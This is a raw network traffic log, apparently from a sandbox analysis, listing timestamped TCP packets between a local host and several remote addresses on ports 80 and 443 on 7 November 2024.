Nov 7, 2024 07:33:24.936264038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936274052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936275005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936295033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936312914 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936785936 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936795950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936805964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936816931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936826944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936837912 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936837912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936850071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936860085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936863899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936885118 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936894894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936906099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936912060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936913967 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936914921 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.936924934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936939955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936961889 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936981916 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.936988115 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.937411070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937421083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937429905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937442064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937455893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937458992 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.937467098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937478065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937489033 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937498093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937509060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937510967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.937520027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937525988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.937530041 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937541962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937551975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937561989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937570095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.937572002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937582970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.937587976 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.937608957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.937622070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.939527035 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.939618111 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.939625025 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.940857887 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.941207886 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.941232920 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.941644907 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.941649914 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.944879055 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.944935083 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.944941044 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.945736885 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.946311951 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.946331978 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.946958065 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.946963072 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.956146002 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.956177950 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.956198931 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.956207037 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.956247091 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.962270021 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.962338924 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.962452888 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.962481022 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.962495089 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.962501049 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.962532043 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.968574047 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.968601942 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.968616009 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.968621969 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.968662977 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.970741034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.970753908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.970765114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.970805883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.970824957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.970835924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.970837116 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.970846891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.970865011 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.970896959 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.970913887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.970956087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.970989943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971008062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971024036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971036911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971041918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971065998 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971071005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971080065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971091032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971097946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971108913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971138954 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971199036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971210003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971251965 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971282959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971293926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971304893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971322060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971323967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971323967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971338987 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971364975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971390963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971436977 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971441984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971515894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971529961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971541882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.971560001 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.971585989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.974272966 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.980585098 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.980663061 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.980669975 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.986382961 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.986428022 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.986433983 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.992722988 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.992774010 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.992779970 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.998428106 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.998476982 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.998482943 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.004731894 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.004779100 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.004785061 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.010863066 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.010926962 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.010932922 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.012979031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.013005972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.013019085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.013055086 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.013078928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.016650915 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.016705036 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.016710997 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.045634031 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.045670033 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.045691013 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.045696020 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.045721054 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.045737982 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.045743942 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.045790911 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.050432920 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.050451040 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.050479889 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.050503969 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.050540924 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.051915884 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.051975965 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.052057981 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.052845955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.052872896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.052886009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.052902937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.052912951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.052917957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.052923918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.052953005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.052995920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053035021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053035021 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053046942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053071976 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053081989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053098917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053246975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053256035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053293943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053316116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053327084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053354979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053356886 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053390980 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053462029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053472042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053488016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053499937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053500891 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053512096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053538084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053549051 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053601027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053613901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053623915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053636074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053649902 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053653002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053663969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.053664923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053690910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.053711891 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054006100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054017067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054028988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054039955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054047108 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054049969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054061890 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054065943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054080009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054090977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054090977 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054101944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054111958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054114103 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054124117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054132938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054151058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054176092 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054254055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054316998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054323912 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054327965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054352999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054387093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054424047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054439068 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054450035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054460049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054461956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054471016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054482937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054505110 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054615021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054625034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054636002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054649115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054666042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054685116 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054771900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054784060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054795027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054805994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054816961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054826975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054835081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054836988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.054850101 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054863930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.054888010 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055037022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055048943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055058956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055071115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055080891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055082083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055118084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055135012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055244923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055262089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055283070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055294037 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055294991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055305958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055318117 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055325985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055355072 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055888891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055898905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055924892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055927038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055939913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055941105 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055951118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055958033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055962086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055973053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055979967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055984020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.055994987 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.055996895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056006908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056020021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056030035 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.056030035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056041002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056061983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.056067944 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.056067944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056080103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056111097 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.056118011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056128979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056138039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056149006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056157112 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.056163073 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056174040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056181908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056190968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.056193113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.056221008 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.056231976 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.068821907 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.068831921 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.068842888 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.068847895 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.072670937 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.072731972 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.072982073 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.075601101 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.075629950 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.075668097 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.075684071 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.075712919 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.083348989 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.083369017 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.083381891 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.083388090 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.086659908 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.086667061 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.090248108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090337992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090349913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090392113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090401888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090409040 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090451956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090486050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090497017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090507030 CET	80	49882	185.215.113.16	192.168.2.4
